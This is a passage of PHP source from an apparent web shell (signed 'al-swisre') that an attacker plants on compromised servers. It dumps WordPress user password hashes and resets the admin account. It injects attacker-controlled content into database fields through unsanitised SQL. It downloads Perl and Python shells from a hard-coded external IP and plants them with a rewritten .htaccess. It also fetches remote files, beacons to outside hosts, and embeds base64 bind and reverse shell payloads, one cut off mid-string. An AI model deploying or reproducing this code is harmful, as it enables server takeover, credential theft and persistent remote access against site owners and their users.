  1824. if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
  1825. else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
  1826.  
  1827.  
  1828. $ap ++;
  1829.  
  1830. }
  1831.  
  1832. echo "</div><br />";
  1833.  
  1834.  
  1835. while ($r3o = mysql_fetch_assoc($sql))
  1836. {
  1837.  
  1838. $email = $r3o['email'];
  1839. $date = $r3o['date'];
  1840. $message = $r3o['message'];
  1841. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
  1842.  
  1843. echo "<tr><td>email : $email </td><td>date : $date </td></tr>
  1844. <tr > <td>message</td> <td colspan='2'>$message</td><br /><br /></tr>";
  1845. echo "</table></div>";
  1846. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1847. exit;
  1848.  
  1849.  
  1850.  
  1851. }
  1852.  
  1853. }
  1854.  
  1855.  
  1856. /////////////////////////////////// backup //////////////////////////
  1857.  
  1858. else if ($op == 'bkup')
  1859. {
  1860.  
  1861.  
  1862.  
  1863.  
  1864.  
  1865.  
  1866. if (isset($_POST['viw']))
  1867. {
  1868.  
  1869.  
  1870.  
  1871. $path = $_POST['path'];
  1872.  
  1873. $domp = @backup_tables($path,$host_c,$user_c,$pass_c,$db_c);
  1874.  
  1875.  
  1876. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Create backup successfully <br /><br /> $path</div> </center>";
  1877. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1878. exit;
  1879.  
  1880.  
  1881.  
  1882.  
  1883.  
  1884.  
  1885. }
  1886. else
  1887. {
  1888.  
  1889. echo'<form method="post">
  1890. <br /><br />
  1891. path backup <br /><br /><input type="text" name="path" /><br /><br />
  1892. <input type="submit" name="viw" value="Create" />
  1893.  
  1894. </form>';
  1895. exit;
  1896.  
  1897.  
  1898.  
  1899.  
  1900.  
  1901. }
  1902.  
  1903.  
  1904. }
  1905.  
  1906.  
  1907.  
  1908.  
  1909.  
  1910. else if ($op == 'sh3')
  1911.  
  1912. {
  1913.  
  1914. if (isset($_POST['viw']))
  1915. {
  1916.  
  1917. $string = $_POST['string'];
  1918. $ch = $_POST['ch'];
  1919.  
  1920. if ($ch == 'trs')
  1921. {
  1922. $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
  1923.  
  1924. }
  1925.  
  1926. else if($ch == 'tr')
  1927. {
  1928. $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%' ");
  1929. }
  1930.  
  1931.  
  1932.  
  1933.  
  1934. $nu0 = @mysql_num_rows($sql4);
  1935. if ($nu0 == 0){echo "No result"; exit;}
  1936.  
  1937. while ($r33o = mysql_fetch_assoc($sql4))
  1938. {
  1939.  
  1940.  
  1941. $date = $r33o['date'];
  1942. $title = $r33o['title'];
  1943. $message = $r33o['message'];
  1944. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
  1945.  
  1946. echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
  1947. <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
  1948. echo "</table></div>";
  1949. exit;
  1950.  
  1951.  
  1952.  
  1953. }
  1954.  
  1955.  
  1956.  
  1957.  
  1958.  
  1959. }
  1960. else
  1961. {
  1962.  
  1963. echo'<form method="post">
  1964. <br /><br />
  1965. search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
  1966. <option value="tr">ticket</option>
  1967. <option value="trs">ticket replies</option>
  1968. </select> <br /><br />
  1969. <input type="submit" name="viw" value="search" />
  1970.  
  1971. </form>';
  1972. exit;
  1973.  
  1974.  
  1975.  
  1976.  
  1977.  
  1978. }
  1979. }
  1980.  
  1981.  
  1982.  
  1983.  
  1984. else if ($op == 'sh3')
  1985.  
  1986. {
  1987.  
  1988. if (isset($_POST['viw']))
  1989. {
  1990.  
  1991. $string = $_POST['string'];
  1992. $ch = $_POST['ch'];
  1993.  
  1994. if ($ch == 'trs')
  1995. {
  1996. $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
  1997.  
  1998. }
  1999.  
  2000. else if($ch == 'tr')
  2001. {
  2002. $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%' ");
  2003. }
  2004.  
  2005.  
  2006.  
  2007.  
  2008. $nu0 = @mysql_num_rows($sql4);
  2009. if ($nu0 == 0){echo "No result"; exit;}
  2010.  
  2011. while ($r33o = @mysql_fetch_assoc($sql4))
  2012. {
  2013.  
  2014.  
  2015. $date = $r33o['date'];
  2016. $title = $r33o['title'];
  2017. $message = $r33o['message'];
  2018. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
  2019.  
  2020. echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
  2021. <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
  2022. echo "</table></div>";
  2023.  
  2024.  
  2025.  
  2026.  
  2027. }
  2028.  
  2029.  
  2030.  
  2031.  
  2032.  
  2033. }
  2034. else
  2035. {
  2036.  
  2037. echo'<form method="post">
  2038. <br /><br />
  2039. search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
  2040. <option value="tr">ticket</option>
  2041. <option value="trs">ticket replies</option>
  2042. </select> <br /><br />
  2043. <input type="submit" name="viw" value="search" />
  2044.  
  2045. </form>';
  2046.  
  2047. exit;
  2048.  
  2049.  
  2050.  
  2051.  
  2052. }
  2053. }
  2054.  
  2055.  
  2056. else if ($op == 'css')
  2057.  
  2058. {
  2059.  
  2060. if (isset($_POST['viw']))
  2061. {
  2062. $index = $_POST['index'];
  2063. $seh = $_POST['string'];
  2064. $rs = search($seh);
  2065. if(count($rs) == 0){echo 'No result';exit;}
  2066. foreach ($rs as $info)
  2067. {
  2068.  
  2069. $table = $info['table'];
  2070. $column = $info['column'];
  2071.  
  2072. echo "table : $table<br /><br />
  2073.  
  2074. column : $column
  2075. <form method=\"post\">
  2076. <br /><br />
  2077. <input type='submit' name='v' value=\"inject\" />
  2078. <input type='hidden' name=\"index\" value=$index>
  2079. <input type=\"hidden\" name=\"table\" value='$table'>
  2080. <input type=\"hidden\" name=\"column\" value='$column' >
  2081. <input type=\"hidden\" name=\"shearc\" value='$seh'>
  2082. </form>
  2083. ";
  2084.  
  2085. exit;
  2086.  
  2087.  
  2088.  
  2089.  
  2090.  
  2091.  
  2092.  
  2093. }
  2094.  
  2095.  
  2096.  
  2097.  
  2098.  
  2099.  
  2100.  
  2101. }
  2102. else
  2103. {
  2104.  
  2105. echo'<form method="post">
  2106. <br /><br />
  2107. search : <input type="text" name="string" />
  2108. <br />
  2109. Css url : <input type="text" name="index"><br /><br />
  2110. <input type="submit" name="viw" value="search" />
  2111.  
  2112. </form>';
  2113. exit;
  2114.  
  2115.  
  2116.  
  2117.  
  2118.  
  2119. }
  2120.  
  2121. if (isset($_POST['v']))
  2122. {
  2123.  
  2124. $seh = $_POST['shearc'] ;
  2125. $table = $_POST['table'];
  2126. $column = $_POST['column'] ;
  2127. $rlcss = $_POST['index'] ;
  2128.  
  2129. $data = "<head><link href=$rlcss rel=stylesheet></head>";
  2130.  
  2131. $query = mysql_query("UPDATE ".$table." SET ".$column." ='$data' WHERE `$column` LIKE '%$seh%'") or die(mysql_error());
  2132. if($query){
  2133. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Injection has been successfully</div> </center>";
  2134. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  2135. exit;
  2136. }else{
  2137. echo '<center><br /><div style=\"color: #003300; font-weight: bold\"> Injection erorr</div>';
  2138.  
  2139.  
  2140. exit;
  2141. }
  2142.  
  2143.  
  2144. }
  2145.  
  2146.  
  2147. }
  2148.  
  2149.  
  2150. else if ($op == 'awp')
  2151.  
  2152. {
  2153.  
  2154.  
  2155.  
  2156. if (isset($_POST['viw']))
  2157. {
  2158.  
  2159. $pass = $_POST['pass'];
  2160. $user = $_POST['user'];
  2161.  
  2162.  
  2163. $crypt = crypt($pass);
  2164.  
  2165. $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$user."' WHERE ID = 1") or die;
  2166. $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die;
  2167.  
  2168. if ($query)
  2169. {
  2170. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated admin successfully </div> </center>";
  2171. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  2172. exit;
  2173. }
  2174. else if (!$query)
  2175. {
  2176. echo "<center><br /><div style=\"color: red; font-weight: bold\">Updated admin erorr </div> </center>";
  2177. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  2178. exit;
  2179.  
  2180. }
  2181.  
  2182.  
  2183.  
  2184.  
  2185.  
  2186.  
  2187.  
  2188. }
  2189. else
  2190. {
  2191.  
  2192. echo'<form method="post">
  2193. <br /><br />
  2194. user : <input type="text" name="user" /><br /><br />
  2195. pass : <input type="text" name="pass" /><br /><br />
  2196. <input type="submit" name="viw" value="update" />
  2197.  
  2198. </form>';
  2199.  
  2200.  
  2201.  
  2202.  
  2203.  
  2204. }
  2205. }
  2206.  
  2207.  
  2208. else if ($op == 'shwp')
  2209. {
  2210.  
  2211.  
  2212.  
  2213.  
  2214.  
  2215. $sql = 'select * from `wp_users`';
  2216. $query =@ mysql_query($sql);
  2217.  
  2218. if ($query)
  2219. {
  2220.  
  2221. while ($row = mysql_fetch_assoc($query))
  2222. {
  2223.  
  2224. echo "
  2225. <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
  2226. <tr>
  2227. <td>ID :</td>
  2228. <td>user :</td>
  2229. <td>pass :</td>
  2230. <td>email :</td>
  2231.  
  2232. </tr>
  2233.  
  2234.  
  2235. <tr>
  2236. <td>".$row['ID']."</td>
  2237. <td>".$row['user_login']."</td>
  2238. <td>".$row['user_pass']."</td>
  2239. <td>".$row['user_email']."</td>
  2240. </tr>
  2241.  
  2242.  
  2243.  
  2244. </table>
  2245.  
  2246.  
  2247. ";
  2248.  
  2249. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  2250. exit;
  2251.  
  2252.  
  2253.  
  2254.  
  2255.  
  2256. }}
  2257.  
  2258. }
  2259.  
  2260.  
  2261.  
  2262. }
  2263.  
  2264. break;
  2265.  
  2266.  
  2267.  
  2268. /////////////////////////////////////////////// info ///////////////////////////////////
  2269. case 'info':
  2270.  
  2271. $sws = 'al-swisre' ;
  2272. if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
  2273.  
  2274. if(strlen($dir)>1 && $dir[1]==":")
  2275. $os = "Windows";
  2276. else $os = "Linux";
  2277. $read = @file_get_contents("http://s92443018.onlinehome.us/cgi-bin/host.php?$ips");
  2278. $r3ad = @file_get_contents("http://aruljohn.com/track.pl?host=$ips") ;
  2279. $ipnet = @findit($read,"<td nowrap>IP-Network</td><td>&nbsp;</td><td nowrap>","</td>");
  2280. $ipb = @findit($read,"<td nowrap>IP-Network-Block</td><td>&nbsp;</td><td nowrap>","</td>");
  2281. $hostname = @findit($read,"Hostname:","<br>");
  2282. $isp = @findit($r3ad,"ISP</td><td>","</td>");
  2283.  
  2284.  
  2285.  
  2286.  
  2287.  
  2288.  
  2289. echo "<div class='info'><table cellpadding='0' align='center' width='60%' >
  2290. <tr><td colspan='2'>Information Server</td><tr>
  2291. <tr><td>Hostname</td><td>".$hostname."</td></tr>
  2292. <tr><td>ISP</td><td>".$isp."</td></tr>
  2293. <tr><td>IP-Network</td><td>".$ipnet."</td></tr>
  2294. <tr><td>IP-Network-Block</td><td>".$ipb."</td></tr>
  2295. <tr><td>Safe Mode</td><td>".(($safe_mode)?(" &nbsp;: <b><font color=red>ON</font></b>"):("<b><font color=green>OFF</font></b>"))."</td></tr>
  2296. <tr><td>System</td><td>".$os."</td></tr>
  2297. <tr><td>PHP Version </td><td>".phpversion()."</td></tr>
  2298. <tr><td>Zend Version </td><td>".@zend_version()."</td></tr>
  2299. <tr><td>Magic_Quotes </td><td>". magicQouts()."</td></tr>
  2300. <tr><td>Curl </td><td>".Curl()."</td></tr>
  2301. <tr><td>Register Globals </td><td>".RegisterGlobals()."</td></tr>
  2302. <tr><td>Open Basedir </td><td>".openBaseDir()."</td></tr>
  2303. <tr><td>Gzip </td><td>".Gzip()."</td></tr>
  2304. <tr><td>Free Space </td><td>".HardSize(disk_free_space('/'))."</td></tr>
  2305. <tr><td>Total Space </td><td>".HardSize(disk_total_space("/"))."</td></tr>
  2306. <tr><td>MySQL</td><td>".MySQL2()."</td></tr>
  2307. <tr><td>MsSQL</td><td>".MsSQL()." </td></tr>
  2308. <tr><td>PostgreSQL</td><td>".PostgreSQL()."</td> </tr>
  2309. <tr><td>Oracle</td><td>".Oracle()."</td></tr>";
  2310.  
  2311. exit;
  2312.  
  2313.  
  2314.  
  2315.  
  2316.  
  2317.  
  2318.  
  2319.  
  2320.  
  2321.  
  2322.  
  2323.  
  2324.  
  2325.  
  2326.  
  2327.  
  2328.  
  2329.  
  2330.  
  2331. break;
  2332.  
  2333.  
  2334. ///////////////////////////////// bypass ///////////////////////
  2335.  
  2336. case 'byp':
  2337.  
  2338.  
  2339. echo '<div class="cont3">
  2340. [ <a href="?sws=byp"> bypass </a>]
  2341.  
  2342. [<a href="?sws=byp&op=shell&sh=perl">Make Shell Perl</a>]
  2343.  
  2344. [<a href="?sws=byp&op=shell&sh=py"> Make Shell Python </a>]
  2345. [<a href="?sws=byp&op=g3t"> Get file </a>]
  2346.  
  2347. </div><br /><br />' ;
  2348.  
  2349. $op = $_GET['op'];
  2350.  
  2351. if(@$_GET['dir']){
  2352. $dir = $_GET['dir'];
  2353. if($dir != 'nullz') $dir = @cleandir($dir);
  2354. }
  2355.  
  2356. if ($op == 'shell')
  2357. {
  2358.  
  2359.  
  2360. $sh = $_GET['sh'];
  2361. ////////////////////////// perl or python //////////////////////
  2362.  
  2363. if (!isset($_POST['get']))
  2364. {
  2365.  
  2366.  
  2367.  
  2368. echo "<form method='post'>
  2369. Path shell : <input type='text' name='path' value='".$dir."/cgi-bin' size='30'/><br /><br />
  2370. name shell : <input type='text' name='name' value='shell.sa' size='25' /><br /><br />
  2371. htaccess :<br /><br /><textarea name='htx'>AddHandler cgi-script .sa</textarea>
  2372. <br /><br />
  2373. <input type='submit' name='get' value='Make' /></form>";
  2374.  
  2375. }else {
  2376.  
  2377.  
  2378. $path = $_POST['path'];
  2379. $name = $_POST['name'];
  2380. $htac = $_POST['htx'];
  2381.  
  2382. if (isset($htac))
  2383. {
  2384.  
  2385. $fop = @fopen("$path/.htaccess", 'w');
  2386.  
  2387. @fwrite($fop,$htac);
  2388.  
  2389. @fclose($fop);
  2390.  
  2391. }
  2392.  
  2393. $rpath = $path."/".$name;
  2394.  
  2395.  
  2396. if ($sh == 'perl')
  2397. {
  2398. $url_shell = 'http://64.15.137.117/~google/cgi-bin/perl.zip'; /// perl
  2399. $path = $dir."/".$d3r."/"."sa.pl";
  2400.  
  2401. }
  2402. else if($sh == 'py')
  2403.  
  2404. {
  2405.  
  2406. $url_shell = 'http://64.15.137.117/~google/cgi-bin/python.zip'; /// python
  2407. $path = $dir."/".$d3r."/"."sa.py";
  2408.  
  2409.  
  2410. }
  2411.  
  2412. //// get shell///
  2413.  
  2414.  
  2415. $fp = @fopen($rpath, 'w');
  2416.  
  2417. $ch = @curl_init($url_shell);
  2418. @curl_setopt($ch, CURLOPT_FILE, $fp);
  2419.  
  2420. $data = @curl_exec($ch);
  2421.  
  2422. @curl_close($ch);
  2423. @fclose($fp);
  2424.  
  2425.  
  2426.  
  2427. if (!is_file($rpath))
  2428. {
  2429.  
  2430.  
  2431.  
  2432. $ch = @curl_init($url_shell);
  2433. @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2434.  
  2435. $data = @curl_exec($ch);
  2436.  
  2437. @curl_close($ch);
  2438.  
  2439. @file_put_contents($rpath, $data);
  2440.  
  2441. }elseif (@is_file($rpath)) {
  2442.  
  2443. $ch =@chmod($rpath,0755);
  2444.  
  2445. echo "Sh3ll have been created<br /><br />
  2446. $rpath";
  2447.  
  2448.  
  2449.  
  2450. }else {echo "error";}
  2451.  
  2452. }
  2453. }
  2454. ///////////////////// get file ////////////////////
  2455. elseif ($op == 'g3t')
  2456. {
  2457.  
  2458. if (!isset($_POST['get']))
  2459. {
  2460.  
  2461.  
  2462. echo 'Get file<br /><br /><br />
  2463. <form method="post">
  2464. <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
  2465. Url file : <input type="text" name="file" />&nbsp;&nbsp;
  2466. to : <input type="text" name="path" value="'.$dir.'/file.php" /><br /><br />
  2467. <input type="submit" name="get" value="Get" />
  2468.  
  2469. </form>' ;exit;
  2470.  
  2471.  
  2472.  
  2473.  
  2474.  
  2475.  
  2476.  
  2477. }
  2478. else
  2479. {
  2480.  
  2481. $url_shell = $_POST['file'];
  2482. $path = $_POST['path'];
  2483.  
  2484.  
  2485.  
  2486. $fp = @fopen($path, 'w');
  2487.  
  2488. $ch = @curl_init($url_shell);
  2489. @curl_setopt($ch, CURLOPT_FILE, $fp);
  2490.  
  2491. $data = @curl_exec($ch);
  2492.  
  2493. @curl_close($ch);
  2494. @fclose($fp);
  2495.  
  2496.  
  2497.  
  2498. if (!is_file($path))
  2499. {
  2500.  
  2501.  
  2502.  
  2503. $ch = @curl_init($url_shell);
  2504. @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2505.  
  2506. $data = @curl_exec($ch);
  2507.  
  2508. @curl_close($ch);
  2509.  
  2510. @file_put_contents($path, $data);
  2511.  
  2512. }elseif (@is_file($path)) {
  2513.  
  2514.  
  2515. echo "got the file successfully<br /><br />
  2516. $path"; exit;
  2517.  
  2518.  
  2519.  
  2520. }else {echo "error";}
  2521.  
  2522.  
  2523.  
  2524. }
  2525.  
  2526.  
  2527.  
  2528.  
  2529.  
  2530. }else if(!isset($op)) {}
  2531.  
  2532.  
  2533.  
  2534.  
  2535.  
  2536.  
  2537.  
  2538. break;
  2539.  
  2540. /////////////////////////////////////////////////// Connect Back ////////////////////////////////////
  2541.  
  2542. case 'con':
  2543.  
  2544.  
  2545.  
  2546. if (!isset($_POST['con']))
  2547. {
  2548. echo "";
  2549.  
  2550. echo "
  2551. <div class='conn'><table cellpadding='0' align='center'>
  2552. <br />
  2553. <form method=\"post\">
  2554. <tr><td>
  2555. <br />Back Connect :<br /> <br />
  2556. Ip : <input type=\"text\" name=\"ip\" value='". $_SERVER['REMOTE_ADDR'] ."' />&nbsp;&nbsp;&nbsp;
  2557. Port : <input type=\"text\" name=\"port\" />&nbsp;&nbsp;&nbsp;
  2558. <select name=\"op\">
  2559. <option value=\"php\">PHP</option>
  2560. <option value=\"perl\">Perl</option>
  2561. <option value=\"python\">Python</option>
  2562. </select>&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"con\" value=\"Connect\" /><br /> <br /><br /></td></tr>
  2563. <tr><td><br />Bind Connect :<br /><br />Port : <input type=\"text\" name=\"bind_port\" /> <select name=\"op\">
  2564. <option value=\"perl\">Perl</option>
  2565. <option value=\"python\">Python</option>
  2566. </select>
  2567. <input type=\"submit\" name=\"con\" value=\"Connect bind\" /> <br /><br /> <br /></td></tr>
  2568.  
  2569.  
  2570. </form>";
  2571.  
  2572. exit;
  2573.  
  2574. }else
  2575. {
  2576.  
  2577. if ($_POST['con'] == 'Connect') {
  2578.  
  2579.  
  2580.  
  2581. $ip = $_POST['ip'] ;
  2582. $port = $_POST['port'] ;
  2583. $op = $_POST['op'] ;
  2584.  
  2585. $bind_perl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2586. $bind_py = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";
  2587.  
  2588. $back_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2589. $back_py = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uIC11DQoNCmltcG9ydCBzeXMsIHNvY2tldCwgb3MNCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KIHByaW50ICJbeF0gVXNvOiAlcyBbaG9zdF0gW3BvcnRdIiAlIChzeXMuYXJndlswXSkNCmVsc2U6DQogaG9zdCA9IHN0cihzeXMuYXJndlsxXSkNCiBwb3J0ID0gaW50KHN5cy5hcmd2WzJdKQ0KIGhhbmRsZXIgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQogdHJ5Og0KICB0cnk6DQogICBpZiBvcy5mb3JrKCkgPiAwOiBvcy5fZXhpdCgwKQ0KICBleGNlcHQgT1NFcnJvciwgZXJyb3I6DQogICBwcmludCAnRXJyb3IgRW4gRm9yazogJWQgKCVzKScgJSAoZXJyb3IuZXJybm8sIGVycm9yLnN0cmVycm9yKQ0KICAgcGlkID0gb3MuZm9yaygpDQogICBpZiBwaWQgPiAwOg0KICAgIHByaW50ICdGb3JrIE5vIFZhbGlkbyEnDQogIGhhbmRsZXIuY29ubmVjdCgoaG9zdCwgcG9ydCkpDQogIG9zLmR1cDIoaGFuZGxlci5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0KICBvcy5kdXAyKGhhbmRsZXIuZmlsZW5vKCksIHN5cy5zdGRvdXQuZmlsZW5vKCkpDQogIHdoaWxlIGhhbmRsZXIucmVjdjoNCiAgIGhhbmRsZXIuc2VuZGFsbCgoJ1xuW1NhdWRpIFNoM2xsXSM+JykpDQogICBvcy5zeXN0ZW0oJy9iaW4vYmFzaCcpDQogZXhjZXB0Og0KICBwcmludCAiWyFdI